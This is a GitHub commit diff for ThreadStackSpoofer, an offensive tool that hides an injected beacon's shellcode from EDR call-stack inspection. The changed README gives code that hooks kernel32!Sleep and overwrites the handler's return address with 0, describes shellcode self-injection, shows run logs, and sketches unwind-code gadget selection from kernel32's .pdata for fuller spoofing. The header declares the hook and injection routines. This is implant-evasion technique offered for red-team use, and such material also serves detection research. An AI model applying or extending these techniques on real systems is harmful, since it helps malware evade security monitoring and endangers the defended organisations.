Skip to content

Commit ad18322

Browse files
committed
Reworked original implementation to now simply overwrite MySleep return address with 0.
1 parent c250724 commit ad18322

File tree

6 files changed

+168
-384
lines changed

6 files changed

+168
-384
lines changed

README.md

Lines changed: 118 additions & 55 deletions
Original file line numberDiff line numberDiff line change
@@ -12,6 +12,25 @@ An implementation may differ, however the idea is roughly similar to what commer
1212
Implementation along with my [ShellcodeFluctuation](https://github.com/mgeeky/ShellcodeFluctuation) brings Offensive Security community sample implementations to catch up on the offering made by commercial C2 products, so that we can do no worse in our Red Team toolings. 💪
1313

1414

15+
### Implementation has changed
16+
17+
Current implementation differs heavily to what was originally published. This is because I realised that there is a way simpler approach to terminate thread's call stack and hide shellcode's related frames by simply writing `0` to the return address of our handler:
18+
19+
```
20+
void WINAPI MySleep(DWORD _dwMilliseconds)
21+
{
22+
[...]
23+
PULONG_PTR overwrite = (PULONG_PTR)_AddressOfReturnAddress();
24+
*overwrite = 0;
25+
26+
[...]
27+
*overwrite = origReturnAddress;
28+
}
29+
```
30+
31+
The previous implementation, utilising `StackWalk64` can be accessed in this [commit c250724](https://github.com/mgeeky/ThreadStackSpoofer/tree/c2507248723d167fb2feddf50d35435a17fd61a2).
32+
33+
1534
## How it works?
1635

1736
This program performs self-injection shellcode (roughly via classic `VirtualAlloc` + `memcpy` + `CreateThread`).
@@ -26,12 +45,9 @@ The rough algorithm is following:
2645
3. Hook `kernel32!Sleep` pointing back to our callback.
2746
4. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread`. A slight twist here is that our thread starts from a legitimate `ntdll!RltUserThreadStart+0x21` address to mimic other threads
2847
5. As soon as Beacon attempts to sleep, our `MySleep` callback gets invoked.
29-
6. Stack Spoofing begins.
30-
7. Firstly we walk call stack of our current thread, utilising `ntdll!RtlCaptureContext` and `dbghelp!StackWalk64`
31-
8. We save all of the stack frames that match our `seems-to-be-beacon-frame` criterias (such as return address points back to a memory being `MEM_PRIVATE` or `Type = 0`, or memory's protection flags are not `R/RX/RWX`)
32-
9. We terate over collected frames (gathered function frame pointers `RBP/EBP` - in `frame.frameAddr`) and overwrite _on-stack_ return addresses with a fake `::CreateFileW` address.
33-
10. Finally a call to `::SleepEx` is made to let the Beacon's sleep while waiting for further communication.
34-
11. After Sleep is finished, we restore previously saved original function return addresses and execution is resumed.
48+
6. Overwrite last return address on the stack to `0` which effectively should finish the call stack.
49+
7. Finally a call to `::SleepEx` is made to let the Beacon's sleep while waiting for further communication.
50+
8. After Sleep is finished, we restore previously saved original function return addresses and execution is resumed.
3551

3652
Function return addresses are scattered all around the thread's stack memory area, pointed to by `RBP/EBP` register. In order to find them on the stack, we need to firstly collect frame pointers, then dereference them for overwriting:
3753

@@ -54,21 +70,22 @@ This is how a call stack may look like when it is **NOT** spoofed:
5470

5571
This in turn, when thread stack spoofing is enabled:
5672

57-
![spoofed](images/spoofed.png)
58-
59-
Above we can see a sequence of `kernel32!CreateFileW` being implanted as return addresses. That's merely an example proving that we can manipulate return addresses.
60-
To better enhance quality of this call stack, one could prepare a list of addresses and then use them while picking subsequent frames for overwriting.
61-
62-
For example, a following chain of addresses could be used:
73+
![spoofed](images/spoofed2.png)
6374

75+
Above we can see that the last frame on our call stack is our `MySleep` callback. That immediately brings opportunities for IOCs hunting for threads having call stacks not unwinding into following two commonly expected system entry points:
6476
```
65-
KernelBase.dll!WaitForSingleObjectEx+0x8e
66-
KernelBase.dll!WaitForSingleObject+0x52
6777
kernel32!BaseThreadInitThunk+0x14
6878
ntdll!RtlUserThreadStart+0x21
69-
```
79+
```
80+
81+
However a brief examination of my system shown, that there are plenty of threads having call stacks not unwinding to the above handlers:
82+
83+
![legit call stack](images/legit-call-stack.png)
84+
85+
The above screenshot shows unmodified, unhooked, thread of Total Commander x64.
86+
87+
Why should we care about carefully faking our call stack when there are processes exhibiting traits that we can simply mimic?
7088

71-
When thinking about AVs, EDRs and other automated scanners - we don't need to care about how much legitimate our thread's call stack look, since these scanners only care whether a frame points back to a `SEC_IMAGE` memory pages, meaning it was a legitimate DLL/EXE call (and whether these DLLs are trusted/signed themselves). Thus, we don't need to bother that much about these chain of `CreateFileW` frames.
7289

7390

7491
## How do I use it?
@@ -105,6 +122,82 @@ Next areas for improving the outcome are to research how we can _exchange_ or co
105122
4. Create a new user stack with `RtlCreateUserStack` / `RtlFreeUserStack` and exchange stacks from a Beacons thread into that newly created one
106123

107124

125+
## Implementing a true Thread Stack Spoofer
126+
127+
Hours-long conversation with [namazso](https://twitter.com/namazso) teached me, that in order to aim for a proper thread stack spoofer we would need to reverse x64 call stack unwinding process.
128+
Firstly, one needs to carefully acknowledge the stack unwinding process explained in (a) linked below. The system when traverses Thread call stack on x64 architecture will not simply rely on return addresses scattered around the thread's stack, but rather it:
129+
130+
1. takes return address
131+
2. attempts to identify function containing that address (with [RtlLookupFunctionEntry](https://docs.microsoft.com/en-us/windows/win32/api/winnt/nf-winnt-rtllookupfunctionentry))
132+
3. That function returns `RUNTIME_FUNCTION`, `UNWIND_INFO` and `UNWIND_CODE` structures. These structures describe where are the function's beginning address, ending address, and where are all the code sequences that modify `RBP` or `RSP`.
133+
4. System needs to know about all stack & frame pointers modifications that happened in each function across the Call Stack to then virtually _rollback_ these changes and virtually restore call stack pointers when a call to the processed call stack frame happened (this is implemented in [RtlVirtualUnwind](https://docs.microsoft.com/ru-ru/windows/win32/api/winnt/nf-winnt-rtlvirtualunwind))
134+
5. The system processes all `UNWIND_CODE`s that examined function exhbits to precisely compute the location of that frame's return address and stack pointer value.
135+
6. Through this emulation, the System is able to walk down the call stacks chain and effectively "unwind" the call stack.
136+
137+
In order to interfere with this process we wuold need to _revert it_ by having our reverted form of `RtlVirtualUnwind`. We would need to iterate over functions defined in a module (let's be it `kernel32`), scan each function's `UNWIND_CODE` codes and closely emulate it backwards (as compared to `RtlVirtualUnwind` and precisely `RtlpUnwindPrologue`) in order to find locations on the stack, where to put our fake return addresses.
138+
139+
[namazso](https://twitter.com/namazso) mentions the necessity to introduce 3 fake stack frames to nicely stitch the call stack:
140+
141+
1. A "desync" frame (consider it as a _gadget-frame_) that unwinds differently compared to the caller of our `MySleep` (having differnt `UWOP` - Unwind Operation code). We do this by looking through all functions from a module, looking through their UWOPs, calculating how big the fake frame should be. This frame must have UWOPS **different** than our `MySleep`'s caller.
142+
2. Next frame that we want to find is a function that unwindws by popping into `RBP` from the stack - basically through `UWOP_PUSH_NONVOL` code.
143+
3. Third frame we need a function that restores `RSP` from `RBP` through the code `UWOP_SET_FPREG`
144+
145+
The restored `RSP` must be set with the `RSP` taken from wherever control flow entered into our `MySleep` so that all our frames become hidden, as a result of third gadget unwinding there.
146+
147+
In order to begin the process, one can iterate over executable's `.pdata` by dereferencing `IMAGE_DIRECTORY_ENTRY_EXCEPTION` data directory entry.
148+
Consider below example:
149+
150+
```
151+
ULONG_PTR imageBase = (ULONG_PTR)GetModuleHandleA("kernel32");
152+
PIMAGE_NT_HEADERS64 pNthdrs = PIMAGE_NT_HEADERS64(imageBase + PIMAGE_DOS_HEADER(imageBase)->e_lfanew);
153+
154+
auto excdir = pNthdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];
155+
if (excdir.Size == 0 || excdir.VirtualAddress == 0)
156+
return;
157+
158+
auto begin = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase);
159+
auto end = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase + excdir.Size);
160+
161+
UNWIND_HISTORY_TABLE mshist = { 0 };
162+
DWORD64 imageBase2 = 0;
163+
164+
PRUNTIME_FUNCTION currFrame = RtlLookupFunctionEntry(
165+
(DWORD64)caller,
166+
&imageBase2,
167+
&mshist
168+
);
169+
170+
UNWIND_INFO *mySleep = (UNWIND_INFO*)(currFrame->UnwindData + imageBase);
171+
UNWIND_CODE myFrameUwop = (UNWIND_CODE)(mySleep->UnwindCodes[0]);
172+
173+
log("1. MySleep RIP UWOP: ", myFrameUwop.UnwindOpcode);
174+
175+
for (PRUNTIME_FUNCTION it = begin; it < end; ++it)
176+
{
177+
UNWIND_INFO* unwindData = (UNWIND_INFO*)(it->UnwindData + imageBase);
178+
UNWIND_CODE frameUwop = (UNWIND_CODE)(unwindData->UnwindCodes[0]);
179+
180+
if (frameUwop.UnwindOpcode != myFrameUwop.UnwindOpcode)
181+
{
182+
// Found candidate function for a desynch gadget frame
183+
184+
}
185+
}
186+
```
187+
188+
The process is a bit convoluted, yet boils down to reverting thread's call stack unwinding process by substituting arbitrary stack frames with carefully selected other ones, in a ROP alike approach.
189+
190+
This PoC does not follows replicate this algorithm, because my current understanding allows me to accept the call stack finishing on an `EXE`-based stack frame and I don't want to overcompliate neither my shellcode loaders nor this PoC. Leaving the exercise of implementing this and sharing publicly to a keen reader. Or maybe I'll sit and have a try on doing this myself given some more spare time :)
191+
192+
193+
**More information**:
194+
195+
a) [x64 exception handling - Stack Unwinding process explained](https://docs.microsoft.com/en-us/cpp/build/exception-handling-x64?view=msvc-160)
196+
b) [Sample implementation of `RtlpUnwindPrologue` and `RtlVirtualUnwind`](https://github.com/mic101/windows/blob/master/WRK-v1.2/base/ntos/rtl/amd64/exdsptch.c)
197+
c) [`.pdata` section](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#the-pdata-section)
198+
d) [another sample implementation of `RtlpUnwindPrologue`](https://github.com/hzqst/unicorn_pe/blob/master/unicorn_pe/except.cpp#L773)
199+
200+
108201
## Example run
109202

110203
Use case:
@@ -121,52 +214,22 @@ Where:
121214
Example run that spoofs beacon's thread call stack:
122215

123216
```
124-
C:\> ThreadStackSpoofer.exe beacon64.bin 1
217+
PS D:\dev2\ThreadStackSpoofer> .\x64\Release\ThreadStackSpoofer.exe .\tests\beacon64.bin 1
125218
[.] Reading shellcode bytes...
126-
[.] Thread call stack will be spoofed.
127-
[+] Stack spoofing initialized.
128219
[.] Hooking kernel32!Sleep...
129220
[.] Injecting shellcode...
130-
131-
WalkCallStack: Stack Trace:
132-
2. calledFrom: 0x7ff7c8ba7f54 - stack: 0xdc5eaffbd0 - frame: 0xdc5eaffce0 - ret: 0x2550d3ebd51 - skip? 0
133-
3. calledFrom: 0x2550d3ebd51 - stack: 0xdc5eaffcf0 - frame: 0xdc5eaffce8 - ret: 0x1388 - skip? 0
134-
4. calledFrom: 0x 1388 - stack: 0xdc5eaffcf8 - frame: 0xdc5eaffcf0 - ret: 0x2550d1ff760 - skip? 0
135-
5. calledFrom: 0x2550d1ff760 - stack: 0xdc5eaffd00 - frame: 0xdc5eaffcf8 - ret: 0x1b000100000004 - skip? 0
136-
6. calledFrom: 0x1b000100000004 - stack: 0xdc5eaffd08 - frame: 0xdc5eaffd00 - ret: 0xd00017003a0001 - skip? 0
137-
7. calledFrom: 0xd00017003a0001 - stack: 0xdc5eaffd10 - frame: 0xdc5eaffd08 - ret: 0x2550d5b7040 - skip? 0
138-
8. calledFrom: 0x2550d5b7040 - stack: 0xdc5eaffd18 - frame: 0xdc5eaffd10 - ret: 0x2550d3ccd9f - skip? 0
139-
9. calledFrom: 0x2550d3ccd9f - stack: 0xdc5eaffd20 - frame: 0xdc5eaffd18 - ret: 0x2550d3ccdd0 - skip? 0
140-
Spoofed: 0x2550d3ebd51 -> 0x7ffeb7f74b60
141-
Spoofed: 0x00001388 -> 0x7ffeb7f74b60
142-
Spoofed: 0x2550d1ff760 -> 0x7ffeb7f74b60
143-
Spoofed: 0x1b000100000004 -> 0x7ffeb7f74b60
144-
Spoofed: 0xd00017003a0001 -> 0x7ffeb7f74b60
145-
Spoofed: 0x2550d5b7040 -> 0x7ffeb7f74b60
146-
Spoofed: 0x2550d3ccd9f -> 0x7ffeb7f74b60
147-
Spoofed: 0x2550d3ccdd0 -> 0x7ffeb7f74b60
221+
[+] Shellcode is now running.
222+
[>] Original return address: 0x1926747bd51. Finishing call stack...
148223
149224
===> MySleep(5000)
150225
151-
[+] Shellcode is now running.
226+
[<] Restoring original return address...
227+
[>] Original return address: 0x1926747bd51. Finishing call stack...
228+
229+
===> MySleep(5000)
152230
153-
WalkCallStack: Stack Trace:
154-
2. calledFrom: 0x7ff7c8ba7f84 - stack: 0xdc5eaffbd0 - frame: 0xdc5eaffce0 - ret: 0x7ffeb7f74b60 - skip? 1
155-
3. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffcf0 - frame: 0xdc5eaffce8 - ret: 0x7ffeb7f74b60 - skip? 1
156-
4. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffcf8 - frame: 0xdc5eaffcf0 - ret: 0x7ffeb7f74b60 - skip? 1
157-
5. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd00 - frame: 0xdc5eaffcf8 - ret: 0x7ffeb7f74b60 - skip? 1
158-
6. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd08 - frame: 0xdc5eaffd00 - ret: 0x7ffeb7f74b60 - skip? 1
159-
7. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd10 - frame: 0xdc5eaffd08 - ret: 0x7ffeb7f74b60 - skip? 1
160-
8. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd18 - frame: 0xdc5eaffd10 - ret: 0x7ffeb7f74b60 - skip? 1
161-
9. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd20 - frame: 0xdc5eaffd18 - ret: 0x7ffeb7f74b60 - skip? 1
162-
Restored: 0x7ffeb7f74b60 -> 0x2550d3ebd51
163-
Restored: 0x7ffeb7f74b60 -> 0x1388
164-
Restored: 0x7ffeb7f74b60 -> 0x2550d1ff760
165-
Restored: 0x7ffeb7f74b60 -> 0x1b000100000004
166-
Restored: 0x7ffeb7f74b60 -> 0xd00017003a0001
167-
Restored: 0x7ffeb7f74b60 -> 0x2550d5b7040
168-
Restored: 0x7ffeb7f74b60 -> 0x2550d3ccd9f
169-
Restored: 0x7ffeb7f74b60 -> 0x2550d3ccdd0
231+
[<] Restoring original return address...
232+
[>] Original return address: 0x1926747bd51. Finishing call stack...
170233
```
171234

172235
## Word of caution

ThreadStackSpoofer/header.h

Lines changed: 1 addition & 47 deletions
Original file line numberDiff line numberDiff line change
@@ -1,59 +1,17 @@
11
#pragma once
22

33
#include <windows.h>
4-
#include <DbgHelp.h>
54
#include <iostream>
65
#include <sstream>
76
#include <iomanip>
87
#include <vector>
98

10-
119
typedef void (WINAPI* typeSleep)(
1210
DWORD dwMilis
1311
);
1412

15-
typedef BOOL(__stdcall* typeStackWalk64)(
16-
DWORD MachineType,
17-
HANDLE hProcess,
18-
HANDLE hThread,
19-
LPSTACKFRAME64 StackFrame,
20-
PVOID ContextRecord,
21-
PREAD_PROCESS_MEMORY_ROUTINE64 ReadMemoryRoutine,
22-
PFUNCTION_TABLE_ACCESS_ROUTINE64 FunctionTableAccessRoutine,
23-
PGET_MODULE_BASE_ROUTINE64 GetModuleBaseRoutine,
24-
PTRANSLATE_ADDRESS_ROUTINE64 TranslateAddress
25-
);
26-
27-
typedef BOOL(__stdcall* typeSymInitialize)(
28-
IN HANDLE hProcess,
29-
IN LPCSTR UserSearchPath,
30-
IN BOOL fInvadeProcess
31-
);
32-
3313
typedef std::unique_ptr<std::remove_pointer<HANDLE>::type, decltype(&::CloseHandle)> HandlePtr;
3414

35-
struct CallStackFrame
36-
{
37-
ULONG_PTR calledFrom;
38-
ULONG_PTR stackAddr;
39-
ULONG_PTR frameAddr;
40-
ULONG_PTR origFrameAddr;
41-
ULONG_PTR retAddr;
42-
ULONG_PTR overwriteWhat;
43-
};
44-
45-
static const size_t MaxStackFramesToSpoof = 64;
46-
struct StackTraceSpoofingMetadata
47-
{
48-
HMODULE hDbghelp;
49-
typeStackWalk64 pStackWalk64;
50-
LPVOID pSymFunctionTableAccess64;
51-
LPVOID pSymGetModuleBase64;
52-
bool initialized;
53-
CallStackFrame spoofedFrame[MaxStackFramesToSpoof];
54-
size_t spoofedFrames;
55-
};
56-
5715
struct HookedSleep
5816
{
5917
typeSleep origSleep;
@@ -71,7 +29,6 @@ struct HookTrampolineBuffers
7129
DWORD previousBytesSize;
7230
};
7331

74-
7532
template<class... Args>
7633
void log(Args... args)
7734
{
@@ -81,14 +38,11 @@ void log(Args... args)
8138
std::cout << oss.str() << std::endl;
8239
}
8340

84-
static const size_t Frames_To_Preserve = 2;
8541
static const DWORD Shellcode_Memory_Protection = PAGE_EXECUTE_READ;
8642

8743
bool hookSleep();
44+
void runShellcode(LPVOID param);
8845
bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr& thread);
8946
bool readShellcode(const char* path, std::vector<uint8_t>& shellcode);
90-
void walkCallStack(HANDLE hThread, CallStackFrame* frames, size_t maxFrames, size_t* numOfFrames, bool onlyBeaconFrames, size_t framesToPreserve = Frames_To_Preserve);
91-
bool initStackSpoofing();
9247
bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers = NULL);
93-
void spoofCallStack(bool overwriteOrRestore);
9448
void WINAPI MySleep(DWORD _dwMilliseconds);

0 commit comments

Comments
 (0)